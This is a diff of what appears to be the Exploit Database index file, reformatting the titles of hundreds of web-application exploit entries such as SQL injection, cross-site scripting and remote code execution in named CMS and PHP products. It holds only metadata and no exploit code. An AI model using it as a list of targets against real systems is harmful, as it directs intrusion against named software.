-15210,platforms/php/webapps/15210.txt,"Cag CMS 0.2 - (Cross-Site Scripting / Blind SQL Injection) Multiple Vulnerabilities",2010-10-05,Shamus,php,webapps,0
+15210,platforms/php/webapps/15210.txt,"Cag CMS 0.2 - Cross-Site Scripting / Blind SQL Injection",2010-10-05,Shamus,php,webapps,0
 15284,platforms/php/webapps/15284.txt,"phpCheckZ 1.1.0 - Blind SQL Injection",2010-10-19,"Salvatore Fresta",php,webapps,0
 15217,platforms/php/webapps/15217.txt,"Feindura File Manager 1.0(rc) - Arbitrary File Upload",2010-10-07,KnocKout,php,webapps,0
 15218,platforms/asp/webapps/15218.txt,"xWeblog 2.2 - (oku.asp?makale_id) SQL Injection",2010-10-07,KnocKout,asp,webapps,0
@@ -24017,7 +24020,7 @@ id,file,description,date,author,platform,type,port
 15225,platforms/php/webapps/15225.txt,"VideoDB 3.0.3 - Multiple Vulnerabilities",2010-10-09,Valentin,php,webapps,0
 15268,platforms/php/webapps/15268.txt,"WikiWebHelp 0.3.3 - Insecure Cookie Handling",2010-10-17,FuRty,php,webapps,0
 39571,platforms/php/webapps/39571.txt,"ZenPhoto 1.4.11 - Remote File Inclusion",2016-03-17,"Curesec Research Team",php,webapps,80
-15269,platforms/php/webapps/15269.txt,"Tastydir 1.2 - (1216) Multiple Vulnerabilities",2010-10-17,R,php,webapps,0
+15269,platforms/php/webapps/15269.txt,"Tastydir 1.2 (1216) - Multiple Vulnerabilities",2010-10-17,R,php,webapps,0
 15227,platforms/php/webapps/15227.txt,"PHP-Fusion Mod Mg User Fotoalbum 1.0.1 - SQL Injection",2010-10-10,"Easy Laster",php,webapps,0
 15592,platforms/php/webapps/15592.txt,"sahitya graphics CMS - Multiple Vulnerabilities",2010-11-21,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
 15593,platforms/php/webapps/15593.html,"Cpanel 11.x - Cross-Site Request Forgery (Edit E-mail)",2010-11-21,"Mon7rF .",php,webapps,0
@@ -24224,7 +24227,7 @@ id,file,description,date,author,platform,type,port
 15681,platforms/asp/webapps/15681.txt,"ASPSiteWare JobPost 1.0 - SQL Injection",2010-12-04,R4dc0re,asp,webapps,0
 15682,platforms/asp/webapps/15682.txt,"ASPSiteWare ASP Gallery 1.0 - SQL Injection",2010-12-04,R4dc0re,asp,webapps,0
 15683,platforms/asp/webapps/15683.txt,"ASPSiteWare Contact Directory 1.0 - SQL Injection",2010-12-04,R4dc0re,asp,webapps,0
-15684,platforms/php/webapps/15684.txt,"WordPress - 'do_trackbacks()' function SQL Injection",2010-12-05,M4g,php,webapps,0
+15684,platforms/php/webapps/15684.txt,"WordPress 3.0.1 - 'do_trackbacks()' function SQL Injection",2010-12-05,M4g,php,webapps,0
 15685,platforms/php/webapps/15685.html,"PHPKF Forum 1.80 - profil_degistir.php Cross-Site Request Forgery",2010-12-05,FreWaL,php,webapps,0
 15686,platforms/asp/webapps/15686.txt,"Gatesoft Docusafe 4.1.0 - SQL Injection",2010-12-05,R4dc0re,asp,webapps,0
 15687,platforms/asp/webapps/15687.txt,"Ecommercemax Solutions Digital Goods Seller - SQL Injection",2010-12-05,R4dc0re,asp,webapps,0
@@ -24339,7 +24342,7 @@ id,file,description,date,author,platform,type,port
 15913,platforms/php/webapps/15913.pl,"PhpGedView 4.2.3 - Local File Inclusion",2011-01-05,dun,php,webapps,0
 15961,platforms/php/webapps/15961.txt,"TinyBB 1.2 - SQL Injection",2011-01-10,Aodrulez,php,webapps,0
 15918,platforms/jsp/webapps/15918.txt,"Openfire 3.6.4 - Multiple Cross-Site Request Forgery Vulnerabilities",2011-01-06,"Riyaz Ahemed Walikar",jsp,webapps,0
-15920,platforms/php/webapps/15920.txt,"F3Site 2011 alfa 1 - (Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities",2011-01-06,"High-Tech Bridge SA",php,webapps,0
+15920,platforms/php/webapps/15920.txt,"F3Site 2011 alfa 1 - Cross-Site Scripting / Cross-Site Request Forgery",2011-01-06,"High-Tech Bridge SA",php,webapps,0
 15921,platforms/php/webapps/15921.txt,"phpMySport 1.4 - SQL Injection / Authentication Bypass / Full Path Disclosure",2011-01-06,"High-Tech Bridge SA",php,webapps,0
 15922,platforms/php/webapps/15922.txt,"Phenotype CMS 3.0 - SQL Injection",2011-01-06,"High-Tech Bridge SA",php,webapps,0
 15923,platforms/php/webapps/15923.txt,"PHP MicroCMS 1.0.1 - Cross-Site Request Forgery / Cross-Site Scripting",2011-01-06,"High-Tech Bridge SA",php,webapps,0
@@ -24383,7 +24386,7 @@ id,file,description,date,author,platform,type,port
 16019,platforms/php/webapps/16019.txt,"phpCMS 2008 - SQL Injection",2011-01-20,R3d-D3V!L,php,webapps,0
 16027,platforms/php/webapps/16027.txt,"phpCMS 9.0 - Blind SQL Injection",2011-01-22,eidelweiss,php,webapps,0
 16028,platforms/php/webapps/16028.txt,"cultbooking 2.0.4 - Multiple Vulnerabilities",2011-01-22,LiquidWorm,php,webapps,0
-16034,platforms/php/webapps/16034.txt,"PHP Coupon Script 6.0 - (bus) Blind SQL Injection",2011-01-23,"BorN To K!LL",php,webapps,0
+16034,platforms/php/webapps/16034.txt,"PHP Coupon Script 6.0 - 'bus' Parameter Blind SQL Injection",2011-01-23,"BorN To K!LL",php,webapps,0
 16037,platforms/php/webapps/16037.html,"PHP Link Directory 4.1.0 - Cross-Site Request Forgery (Add Admin)",2011-01-23,AtT4CKxT3rR0r1ST,php,webapps,0
 16060,platforms/php/webapps/16060.txt,"comercioplus 5.6 - Multiple Vulnerabilities",2011-01-27,"Daniel Godoy",php,webapps,0
 16044,platforms/php/webapps/16044.txt,"ab Web CMS 1.35 - Multiple Vulnerabilities",2011-01-25,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
@@ -24431,7 +24434,7 @@ id,file,description,date,author,platform,type,port
 16168,platforms/php/webapps/16168.txt,"RunCMS 2.2.2 - Multiple Vulnerabilities",2011-02-14,"High-Tech Bridge SA",php,webapps,0
 16143,platforms/php/webapps/16143.txt,"MihanTools Script 1.3.3 - SQL Injection",2011-02-09,WHITE_DEVIL,php,webapps,0
 16144,platforms/php/webapps/16144.txt,"WordPress Plugin Enable Media Replace - Multiple Vulnerabilities",2011-02-09,"Ulf Harnhammar",php,webapps,0
-16183,platforms/php/webapps/16183.txt,"GAzie 5.10 - (Login Parameter) Multiple Vulnerabilities",2011-02-17,LiquidWorm,php,webapps,0
+16183,platforms/php/webapps/16183.txt,"GAzie 5.10 - Login Parameter Multiple Vulnerabilities",2011-02-17,LiquidWorm,php,webapps,0
 16165,platforms/php/webapps/16165.txt,"AWCM 2.2 Final - Persistent Cross-Site Script",2011-02-14,_84kur10_,php,webapps,0
 16148,platforms/php/webapps/16148.txt,"SourceBans 1.4.7 - Cross-Site Scripting",2011-02-09,Sw1tCh,php,webapps,0
 16152,platforms/multiple/webapps/16152.py,"LocatePC 1.05 (Ligatt Version + Others) - SQL Injection",2011-02-10,anonymous,multiple,webapps,0
@@ -25041,7 +25044,7 @@ id,file,description,date,author,platform,type,port
 18056,platforms/php/webapps/18056.txt,"jbShop - e107 7 CMS Plugin - SQL Injection",2011-10-31,"Robert Cooper",php,webapps,0
 18058,platforms/php/webapps/18058.txt,"Joomla! Component Alameda 1.0 - SQL Injection",2011-10-31,kaMtiEz,php,webapps,0
 18061,platforms/hardware/webapps/18061.txt,"ZTE ZXDSL 831IIV7.5.0a_Z29_OV - Multiple Vulnerabilities",2011-11-01,"mehdi boukazoula",hardware,webapps,0
-18063,platforms/php/webapps/18063.txt,"BST - BestShopPro (nowosci.php) Multiple Vulnerabilities",2011-11-02,CoBRa_21,php,webapps,0
+18063,platforms/php/webapps/18063.txt,"BST (BestShopPro) - 'nowosci.php' Multiple Vulnerabilities",2011-11-02,CoBRa_21,php,webapps,0
 18065,platforms/php/webapps/18065.txt,"SetSeed CMS 5.8.20 - (loggedInUser) SQL Injection",2011-11-02,LiquidWorm,php,webapps,0
 18066,platforms/php/webapps/18066.txt,"CaupoShop Pro (2.x / <= 3.70) Classic 3.01 - Local File Inclusion",2011-11-02,"Rami Salama",php,webapps,0
 18069,platforms/php/webapps/18069.txt,"Jara 1.6 - Multiple Vulnerabilities",2011-11-03,Or4nG.M4N,php,webapps,0
@@ -25213,7 +25216,7 @@ id,file,description,date,author,platform,type,port
 18470,platforms/php/webapps/18470.txt,"Ananta Gazelle CMS - Update Statement SQL Injection",2012-02-08,hackme,php,webapps,0
 18473,platforms/multiple/webapps/18473.txt,"Cyberoam Central Console 2.00.2 - File Inclusion",2012-02-08,Vulnerability-Lab,multiple,webapps,0
 18480,platforms/php/webapps/18480.txt,"Dolibarr 3.2.0 < Alpha - File Inclusion",2012-02-10,Vulnerability-Lab,php,webapps,0
-18483,platforms/php/webapps/18483.txt,"Fork CMS 3.2.4 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2012-02-12,"Avram Marius",php,webapps,0
+18483,platforms/php/webapps/18483.txt,"Fork CMS 3.2.4 - Local File Inclusion / Cross-Site Scripting",2012-02-12,"Avram Marius",php,webapps,0
 18499,platforms/hardware/webapps/18499.txt,"D-Link DSL-2640B ADSL Router - Cross-Site Request Forgery",2012-02-20,"Ivano Binetti",hardware,webapps,0
 18487,platforms/php/webapps/18487.html,"SocialCMS 1.0.2 - Cross-Site Request Forgery",2012-02-16,"Ivano Binetti",php,webapps,0
 18494,platforms/php/webapps/18494.txt,"Pandora Fms 4.0.1 - Local File Inclusion",2012-02-17,Vulnerability-Lab,php,webapps,0
@@ -25227,7 +25230,7 @@ id,file,description,date,author,platform,type,port
 18563,platforms/php/webapps/18563.txt,"Fork CMS 3.2.5 - Multiple Vulnerabilities",2012-02-21,"Ivano Binetti",php,webapps,0
 18506,platforms/php/webapps/18506.txt,"Brim < 2.0.0 - SQL Injection",2012-02-22,ifnull,php,webapps,0
 18508,platforms/php/webapps/18508.txt,"LimeSurvey (PHPSurveyor 1.91+ stable) - Blind SQL Injection",2012-02-22,TorTukiTu,php,webapps,0
-18513,platforms/php/webapps/18513.txt,"DFLabs PTK 1.0.5 - (Steal Authentication Credentials) Multiple Vulnerabilities",2012-02-22,"Ivano Binetti",php,webapps,0
+18513,platforms/php/webapps/18513.txt,"DFLabs PTK 1.0.5 - Steal Authentication Credentials",2012-02-22,"Ivano Binetti",php,webapps,0
 18509,platforms/hardware/webapps/18509.html,"D-Link DCS Series - Cross-Site Request Forgery (Change Admin Password)",2012-02-22,rigan,hardware,webapps,0
 18510,platforms/windows/webapps/18510.txt,"WebcamXP and webcam 7 - Directory Traversal",2012-02-22,Silent_Dream,windows,webapps,0
 18511,platforms/hardware/webapps/18511.txt,"D-Link DSL-2640B - Authentication Bypass",2012-02-22,"Ivano Binetti",hardware,webapps,0
@@ -25289,7 +25292,7 @@ id,file,description,date,author,platform,type,port
 18649,platforms/php/webapps/18649.txt,"FreePBX 2.10.0 / 2.9.0 - Multiple Vulnerabilities",2012-03-22,"Martin Tschirsich",php,webapps,0
 18650,platforms/php/webapps/18650.py,"FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution",2012-03-23,muts,php,webapps,0
 18651,platforms/asp/webapps/18651.txt,"Sitecom WLM-2501 - Multiple Cross-Site Request Forgery Vulnerabilities",2012-03-23,"Ivano Binetti",asp,webapps,0
-18652,platforms/php/webapps/18652.txt,"Wolfcms 0.75 - (Cross-Site Request Forgery / Cross-Site Scripting) Multiple Vulnerabilities",2012-03-23,"Ivano Binetti",php,webapps,0
+18652,platforms/php/webapps/18652.txt,"Wolfcms 0.75 - Cross-Site Request Forgery / Cross-Site Scripting",2012-03-23,"Ivano Binetti",php,webapps,0
 18655,platforms/php/webapps/18655.php,"PHPFox 3.0.1 - (ajax.php) Remote Command Execution",2012-03-23,EgiX,php,webapps,0
 18659,platforms/php/webapps/18659.rb,"FreePBX 2.10.0 / 2.9.0 - callmenum Remote Code Execution (Metasploit)",2012-03-24,Metasploit,php,webapps,0
 18660,platforms/php/webapps/18660.txt,"RIPS 0.53 - Multiple Local File Inclusion",2012-03-24,localh0t,php,webapps,0
@@ -25375,7 +25378,7 @@ id,file,description,date,author,platform,type,port
 18881,platforms/java/webapps/18881.txt,"Liferay Portal 6.0.x < 6.1 - Privilege Escalation",2012-05-13,"Jelmer Kuperus",java,webapps,0
 18882,platforms/php/webapps/18882.txt,"b2ePms 1.0 - Authentication Bypass",2012-05-15,"Jean Pascal Pereira",php,webapps,0
 18884,platforms/php/webapps/18884.txt,"S9Y Serendipity 1.6 - (Backend) Cross-Site Scripting / SQL Injection",2012-05-08,"Stefan Schurtz",php,webapps,0
-18886,platforms/php/webapps/18886.txt,"Axous 1.1.1 - (Cross-Site Request Forgery / Persistent Cross-Site Scripting) Multiple Vulnerabilities",2012-05-16,"Ivano Binetti",php,webapps,0
+18886,platforms/php/webapps/18886.txt,"Axous 1.1.1 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2012-05-16,"Ivano Binetti",php,webapps,0
 18888,platforms/jsp/webapps/18888.txt,"OpenKM Document Management System 5.1.7 - Command Execution",2012-01-03,"Cyrill Brunschwiler",jsp,webapps,0
 18889,platforms/php/webapps/18889.txt,"Artiphp CMS 5.5.0 - Database Backup Disclosure",2012-05-16,LiquidWorm,php,webapps,0
 18899,platforms/php/webapps/18899.txt,"PHP Address Book 7.0.0 - Multiple Vulnerabilities",2012-05-19,"Stefan Schurtz",php,webapps,0
@@ -26045,7 +26048,7 @@ id,file,description,date,author,platform,type,port
 22263,platforms/cgi/webapps/22263.pl,"cPanel 5.0 - Guestbook.cgi Remote Command Execution (4)",2003-02-19,pokleyzz,cgi,webapps,0
 22266,platforms/php/webapps/22266.php,"PHP-Nuke 5.6/6.0 - Search Engine SQL Injection",2003-02-19,"David Zentner",php,webapps,0
 22267,platforms/php/webapps/22267.php,"PHPBB2 - Page_Header.php SQL Injection",2003-02-19,"David Zentner",php,webapps,0
-22268,platforms/php/webapps/22268.txt,"myPHPNuke 1.8.8 - links.php Cross-Site Scripting",2003-02-20,"Tacettin Karadeniz",php,webapps,0
+22268,platforms/php/webapps/22268.txt,"myPHPNuke 1.8.8 - 'links.php' Cross-Site Scripting",2003-02-20,"Tacettin Karadeniz",php,webapps,0
 22277,platforms/php/webapps/22277.txt,"Nuked-klaN 1.3 - Remote Information Disclosure",2003-02-23,"gregory Le Bras",php,webapps,0
 22281,platforms/php/webapps/22281.php,"Mambo Site Server 4.0.12 RC2 - Cookie Validation",2003-02-24,"Simen Bergo",php,webapps,0
 22282,platforms/php/webapps/22282.txt,"WihPhoto 0.86 - dev sendphoto.php File Disclosure",2003-02-24,frog,php,webapps,0
@@ -26363,7 +26366,7 @@ id,file,description,date,author,platform,type,port
 23158,platforms/php/webapps/23158.txt,"Mambo Site Server 4.0.14 - banners.php bid Parameter SQL Injection",2003-09-18,"Lifo Fifo",php,webapps,0
 23159,platforms/php/webapps/23159.txt,"Mambo Site Server 4.0.14 - emailarticle.php id Parameter SQL Injection",2003-09-18,"Lifo Fifo",php,webapps,0
 23160,platforms/php/webapps/23160.txt,"Mambo Site Server 4.0.14 - contact.php Unauthorized Mail Relay",2003-09-18,"Lifo Fifo",php,webapps,0
-23163,platforms/php/webapps/23163.txt,"Flying Dog Software Powerslave 4.3 Portalmanager - sql_id Information Disclosure",2003-09-19,"H Zero Seven",php,webapps,0
+23163,platforms/php/webapps/23163.txt,"Flying Dog Software Powerslave 4.3 Portalmanager - 'sql_id' Information Disclosure",2003-09-19,"H Zero Seven",php,webapps,0
 23164,platforms/php/webapps/23164.txt,"myPHPNuke 1.8.8 - 'auth.inc.php' SQL Injection",2003-09-20,"Lifo Fifo",php,webapps,0
 40403,platforms/php/webapps/40403.txt,"Dolphin 7.3.0 - Error-Based SQL Injection",2016-09-20,"Kacper Szurek",php,webapps,80
 23175,platforms/php/webapps/23175.txt,"yMonda Thread-IT 1.6 - Multiple Fields HTML Injection",2003-09-24,"Bahaa Naamneh",php,webapps,0
@@ -28508,9 +28511,9 @@ id,file,description,date,author,platform,type,port
 26787,platforms/php/webapps/26787.txt,"phpCOIN 1.2.2 - CCFG[_PKG_PATH_DBSE] Remote File Inclusion",2005-12-13,retrogod@aliceposta.it,php,webapps,0
 26788,platforms/php/webapps/26788.txt,"PHPCOIN 1.2.2 - 'includes/db.php $_CCFG[_PKG_PATH_DBSE]' Parameter Traversal Arbitrary File Access",2005-12-13,retrogod@aliceposta.it,php,webapps,0
 26789,platforms/php/webapps/26789.txt,"EncapsGallery 1.0 - gallery.php SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0
-26790,platforms/php/webapps/26790.txt,"PHPWebGallery 1.3.4/1.5.1 - comments.php Multiple Parameter SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0
-26791,platforms/php/webapps/26791.txt,"PHPWebGallery 1.3.4/1.5.1 - category.php search Parameter SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0
-26792,platforms/php/webapps/26792.txt,"PHPWebGallery 1.3.4/1.5.1 - picture.php image_id Parameter SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0
+26790,platforms/php/webapps/26790.txt,"PHPWebGallery 1.3.4/1.5.1 - 'comments.php' SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0
+26791,platforms/php/webapps/26791.txt,"PHPWebGallery 1.3.4/1.5.1 - 'category.php' SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0
+26792,platforms/php/webapps/26792.txt,"PHPWebGallery 1.3.4/1.5.1 - 'picture.php' SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0
 26793,platforms/php/webapps/26793.txt,"Plogger Beta 2 - 'index.php' id Parameter SQL Injection",2005-12-13,r0t,php,webapps,0
 26794,platforms/php/webapps/26794.txt,"Plogger Beta 2 - 'index.php' Multiple Parameter Cross-Site Scripting",2005-12-13,r0t,php,webapps,0
 26795,platforms/php/webapps/26795.txt,"VCD-db 0.9x - search.php by Parameter SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0
@@ -28924,8 +28927,8 @@ id,file,description,date,author,platform,type,port
 27305,platforms/php/webapps/27305.txt,"PHPX 3.5.9 - XCode Tag HTML Injection",2006-02-23,"Thomas Pollet",php,webapps,0
 27306,platforms/php/webapps/27306.txt,"JGS-Gallery 4.0 - jgs_galerie_slideshow.php Multiple Parameter Cross-Site Scripting",2006-02-23,nuker,php,webapps,0
 27307,platforms/php/webapps/27307.txt,"JGS-Gallery 4.0 - Board jgs_galerie_scroll.php userid Parameter Cross-Site Scripting",2006-02-23,nuker,php,webapps,0
-27308,platforms/php/webapps/27308.txt,"myPHPNuke 1.8.8 - reviews.php letter Parameter Cross-Site Scripting",2006-02-22,"Mustafa Can Bjorn",php,webapps,0
-27309,platforms/php/webapps/27309.txt,"myPHPNuke 1.8.8 - download.php dcategory Parameter Cross-Site Scripting",2006-02-22,"Mustafa Can Bjorn",php,webapps,0
+27308,platforms/php/webapps/27308.txt,"myPHPNuke 1.8.8 - 'reviews.php' Cross-Site Scripting",2006-02-22,"Mustafa Can Bjorn",php,webapps,0
+27309,platforms/php/webapps/27309.txt,"myPHPNuke 1.8.8 - 'download.php' Cross-Site Scripting",2006-02-22,"Mustafa Can Bjorn",php,webapps,0
 27310,platforms/asp/webapps/27310.txt,"Battleaxe Software BttlxeForum 2.0 - Failure.asp Cross-Site Scripting",2006-02-25,rUnViRuS,asp,webapps,0
 27311,platforms/php/webapps/27311.txt,"SPiD 1.3.1 - Scan_Lang_Insert.php Local File Inclusion",2006-02-25,"NSA Group",php,webapps,0
 27312,platforms/php/webapps/27312.txt,"FreeHostShop Website Generator 3.3 - Arbitrary File Upload",2006-02-25,"NSA Group",php,webapps,0
@@ -29079,7 +29082,7 @@ id,file,description,date,author,platform,type,port
 27514,platforms/php/webapps/27514.txt,"Tribq CMS 5.2.7 - Cross-Site Request Forgery (Adding/Editing New Administrator Account)",2013-08-12,"Yashar shahinzadeh",php,webapps,0
 27515,platforms/php/webapps/27515.txt,"Open Real Estate CMS 1.5.1 - Multiple Vulnerabilities",2013-08-12,"Yashar shahinzadeh",php,webapps,0
 27518,platforms/php/webapps/27518.txt,"MLMAuction Script - 'gallery.php id Parameter' SQL Injection",2013-08-12,3spi0n,php,webapps,0
-27519,platforms/php/webapps/27519.txt,"phpVID 1.2.3 - Multiple Vulnerabilities",2013-08-12,3spi0n,php,webapps,0
+27519,platforms/php/webapps/27519.txt,"PHPVID 1.2.3 - Multiple Vulnerabilities",2013-08-12,3spi0n,php,webapps,0
 27729,platforms/php/webapps/27729.txt,"Scry Gallery 1.1 - 'index.php' Cross-Site Scripting",2006-04-24,mayank,php,webapps,0
 27521,platforms/php/webapps/27521.txt,"Ajax PHP Penny Auction 1.x 2.x - Multiple Vulnerabilities",2013-08-12,"Taha Hunter",php,webapps,80
 27522,platforms/php/webapps/27522.txt,"Gnew 2013.1 - Multiple Vulnerabilities (1)",2013-08-12,LiquidWorm,php,webapps,80
@@ -29125,8 +29128,8 @@ id,file,description,date,author,platform,type,port
 27584,platforms/php/webapps/27584.txt,"JBook 1.3 - 'index.php' Cross-Site Scripting",2006-04-10,Psych0,php,webapps,0
 27585,platforms/php/webapps/27585.txt,"PHPMyForum 4.0 - 'index.php' page Parameter Cross-Site Scripting",2006-04-10,Psych0,php,webapps,0
 27586,platforms/php/webapps/27586.txt,"PHPMyForum 4.0 - 'index.php' type Variable CRLF Injection",2006-04-10,Psych0,php,webapps,0
-27587,platforms/php/webapps/27587.txt,"PHPWebGallery 1.4.1 - category.php Multiple Parameter Cross-Site Scripting",2006-04-10,Psych0,php,webapps,0
-27588,platforms/php/webapps/27588.txt,"PHPWebGallery 1.4.1 - picture.php Multiple Parameter Cross-Site Scripting",2006-04-10,Psych0,php,webapps,0
+27587,platforms/php/webapps/27587.txt,"PHPWebGallery 1.4.1 - 'category.php' Cross-Site Scripting",2006-04-10,Psych0,php,webapps,0
+27588,platforms/php/webapps/27588.txt,"PHPWebGallery 1.4.1 - 'picture.php' Cross-Site Scripting",2006-04-10,Psych0,php,webapps,0
 27589,platforms/php/webapps/27589.txt,"SPIP 1.8.3 - Spip_login.php Remote File Inclusion",2006-04-10,cR45H3R,php,webapps,0
 27590,platforms/php/webapps/27590.txt,"APT-webshop 3.0/4.0 - modules.php Multiple SQL Injection",2005-04-10,r0t,php,webapps,0
 27591,platforms/php/webapps/27591.txt,"Shadowed Portal 5.7 - Load.php Cross-Site Scripting",2006-04-10,Liz0ziM,php,webapps,0
@@ -29158,7 +29161,7 @@ id,file,description,date,author,platform,type,port
 27628,platforms/php/webapps/27628.txt,"SWSoft Confixx 3.0.6/3.0.8/3.1.2 - 'index.php' SQL Injection",2006-04-11,LoK-Crew,php,webapps,0
 27629,platforms/php/webapps/27629.txt,"Chipmunk Guestbook 1.3 - 'index.php' SQL Injection",2006-04-12,Dr.Jr7,php,webapps,0
 27631,platforms/cgi/webapps/27631.txt,"Interaktiv.shop 4/5 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-12,r0t,cgi,webapps,0
-27632,platforms/php/webapps/27632.txt,"phpMyAdmin 2.7 - sql.php Cross-Site Scripting",2005-10-31,p0w3r,php,webapps,0
+27632,platforms/php/webapps/27632.txt,"phpMyAdmin 2.7 - 'sql.php' Cross-Site Scripting",2005-10-31,p0w3r,php,webapps,0
 27638,platforms/php/webapps/27638.pl,"SimpleBBS 1.0.6/1.0.7/1.1 - Arbitrary Command Execution",2006-04-13,rUnViRuS,php,webapps,0
 27642,platforms/php/webapps/27642.txt,"AR-Blog 5.2 - print.php Cross-Site Scripting",2006-04-14,ALMOKANN3,php,webapps,0
 27643,platforms/php/webapps/27643.php,"PHPAlbum 0.2.2/0.2.3/4.1 - Language.php File Inclusion",2006-04-15,rgod,php,webapps,0
@@ -29488,7 +29491,7 @@ id,file,description,date,author,platform,type,port
 28098,platforms/php/webapps/28098.txt,"PHP Blue Dragon CMS 2.9.1 - Multiple Remote File Inclusion",2006-06-22,Shm,php,webapps,0
 28101,platforms/php/webapps/28101.txt,"Custom Dating Biz 1.0 - Multiple Input Validation Vulnerabilities",2006-06-24,Luny,php,webapps,0
 28102,platforms/php/webapps/28102.txt,"Winged Gallery 1.0 - Thumb.php Cross-Site Scripting",2006-06-24,Luny,php,webapps,0
-28104,platforms/php/webapps/28104.txt,"ADOdb 4.6/4.7 - Tmssql.php Cross-Site Scripting",2006-06-26,"Rodrigo Silva",php,webapps,0
+28104,platforms/php/webapps/28104.txt,"ADODB 4.6/4.7 - 'Tmssql.php' Cross-Site Scripting",2006-06-26,"Rodrigo Silva",php,webapps,0
 28105,platforms/php/webapps/28105.txt,"eNpaper1 - Root_Header.php Remote File Inclusion",2006-06-26,almaster,php,webapps,0
 28106,platforms/php/webapps/28106.txt,"Bee-hive 1.2 - Multiple Remote File Inclusion",2006-06-16,Kw3[R]Ln,php,webapps,0
 28107,platforms/php/webapps/28107.txt,"Cpanel 10 - Select.HTML Cross-Site Scripting",2006-06-26,preth00nker,php,webapps,0
@@ -29536,7 +29539,7 @@ id,file,description,date,author,platform,type,port
 28157,platforms/php/webapps/28157.txt,"VirtuaStore 2.0 - Password Parameter SQL Injection",2006-07-03,supermalhacao,php,webapps,0
 28158,platforms/php/webapps/28158.txt,"QTO File Manager 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-07-03,"EllipSiS Security",php,webapps,0
 28159,platforms/php/webapps/28159.txt,"Glossaire 1.7 - Remote File Inclusion",2006-07-03,"CrAzY CrAcKeR",php,webapps,0
-28161,platforms/php/webapps/28161.txt,"PHPWebGallery 1.x - comments.php Cross-Site Scripting",2006-07-04,iss4m,php,webapps,0
+28161,platforms/php/webapps/28161.txt,"PHPWebGallery 1.x - 'comments.php' Cross-Site Scripting",2006-07-04,iss4m,php,webapps,0
 28162,platforms/php/webapps/28162.txt,"Randshop 0.9.3/1.2 - 'index.php' Remote File Inclusion",2006-07-04,black-code,php,webapps,0
 28163,platforms/php/webapps/28163.txt,"PostNuke 0.6x/0.7x - Multiple Cross-Site Scripting Vulnerabilities",2006-07-04,rgod,php,webapps,0
 28166,platforms/php/webapps/28166.pl,"LifeType 1.0.5 - 'index.php' Date Parameter SQL Injection",2006-07-05,"Alejandro Ramos",php,webapps,0
@@ -29969,7 +29972,7 @@ id,file,description,date,author,platform,type,port
 28780,platforms/php/webapps/28780.txt,"Softerra PHP Developer Library 1.5.3 - Grid3.lib.php Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0
 28781,platforms/php/webapps/28781.txt,"BlueShoes Framework 4.6 - GoogleSearch.php Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0
 28782,platforms/php/webapps/28782.txt,"Tagit2b - DelTagUser.php Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0
-28783,platforms/php/webapps/28783.txt,"MySQLDumper 1.21 - sql.php Cross-Site Scripting",2006-10-10,Crackers_Child,php,webapps,0
+28783,platforms/php/webapps/28783.txt,"MySQLDumper 1.21 - 'sql.php' Cross-Site Scripting",2006-10-10,Crackers_Child,php,webapps,0
 28784,platforms/php/webapps/28784.txt,"Gcards 1.13 - Addnews.php Remote File Inclusion",2006-10-11,"DeatH VirUs",php,webapps,0
 28786,platforms/php/webapps/28786.pl,"CommunityPortals 1.0 - bug.php Remote File Inclusion",2006-10-11,"Nima Salehi",php,webapps,0
 28787,platforms/php/webapps/28787.txt,"Dokeos 1.6.4 - Multiple Remote File Inclusions Vulnerabilities",2006-10-11,viper-haCker,php,webapps,0
@@ -30944,7 +30947,7 @@ id,file,description,date,author,platform,type,port
 30230,platforms/php/webapps/30230.txt,"MyNews 0.10 - AuthACC SQL Injection",2007-06-25,netVigilance,php,webapps,0
 30232,platforms/php/webapps/30232.txt,"Calendarix 0.7.20070307 - Multiple Cross-Site Scripting Vulnerabilities",2007-06-25,"Jesper Jurcenoks",php,webapps,0
 30234,platforms/php/webapps/30234.txt,"Calendarix 0.7.20070307 - Multiple SQL Injections",2007-06-25,"Jesper Jurcenoks",php,webapps,0
-30235,platforms/php/webapps/30235.txt,"KikChat - (Local File Inclusion / Remote Code Execution) Multiple Vulnerabilities",2013-12-12,cr4wl3r,php,webapps,0
+30235,platforms/php/webapps/30235.txt,"KikChat - Local File Inclusion / Remote Code Execution",2013-12-12,cr4wl3r,php,webapps,0
 30238,platforms/php/webapps/30238.txt,"Cythosia 2.x Botnet - SQL Injection",2013-12-12,GalaxyAndroid,php,webapps,0
 30366,platforms/php/webapps/30366.txt,"Alstrasoft Video Share Enterprise 4.x - Multiple Input Validation Vulnerabilities",2007-07-23,Lostmon,php,webapps,0
 30246,platforms/php/webapps/30246.txt,"WHMCS 4.x / 5.x - Multiple Web Vulnerabilities",2013-12-12,"AhwAk20o0 --",php,webapps,0
@@ -32144,7 +32147,7 @@ id,file,description,date,author,platform,type,port
 32091,platforms/php/webapps/32091.txt,"MyBlog 0.9.8 - Multiple Remote Information Disclosure Vulnerabilities",2008-07-21,"AmnPardaz Security Research Team",php,webapps,0
 32092,platforms/php/webapps/32092.txt,"Flip 3.0 - 'config.php' Remote File Inclusion",2008-07-21,Cru3l.b0y,php,webapps,0
 32093,platforms/php/webapps/32093.txt,"PHPKF - 'forum_duzen.php' SQL Injection",2008-07-21,U238,php,webapps,0
-32096,platforms/php/webapps/32096.pl,"EasyE-Cards 3.10 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-07-21,Dr.Crash,php,webapps,0
+32096,platforms/php/webapps/32096.pl,"EasyE-Cards 3.10 - SQL Injection / Cross-Site Scripting",2008-07-21,Dr.Crash,php,webapps,0
